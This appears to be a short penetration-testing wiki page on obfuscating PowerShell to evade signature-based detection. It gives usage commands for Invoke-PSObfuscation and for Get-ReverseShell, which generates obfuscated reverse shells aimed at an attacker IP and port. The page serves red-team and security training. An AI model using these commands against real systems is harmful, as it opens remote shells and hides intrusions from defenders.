PowerShell Obfuscation
Theory
Following techniques aiming to evade detection based on signatures by obfuscating PowerShell scripts and commands.
Practice
Invoke-PsObfuscation
invoke-psobfuscation is a powerfull powershell obfuscating tool.
We may use invoke-psobfuscation using pwshon a unix-like host
We can import the tool as follows.
Import-Module ./Invoke-PSObfuscation.ps1To obfuscate a powershell file, use the following cmdlets.
# Using all switches
Invoke-PSObfuscation -Path in.ps1 -PipelineVariables -Pipes -Cmdlets -Methods -Integers -Aliases -Comments -NamespaceClasses -Variables -Strings -OutFile out.ps1Get-ReverseShell
Get-ReverseShell is a tool with the sole purpose of producing obfuscated reverse shells for PowerShell.
We may use Get-ReverseShell using pwshon a unix-like host
We can import the tool as follows.
Import-Module ./get-reverseshell.ps1To generate a revers shell, use the following cmdlets
# To stdout
Get-ReverseShell -Ip $IP -Port $PORT
# To file
Get-ReverseShell -Ip $IP -Port $PORT -OutFile /path/to/rev.ps1Invoke-Obfuscation
Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator. Even though it is quite old, it is still relevant for bypassing static detections.
We may use Invoke-Obfuscation using pwshon a unix-like host
We can import and start the tool as follows.
Here are some usage examples:
Last updated
Was this helpful?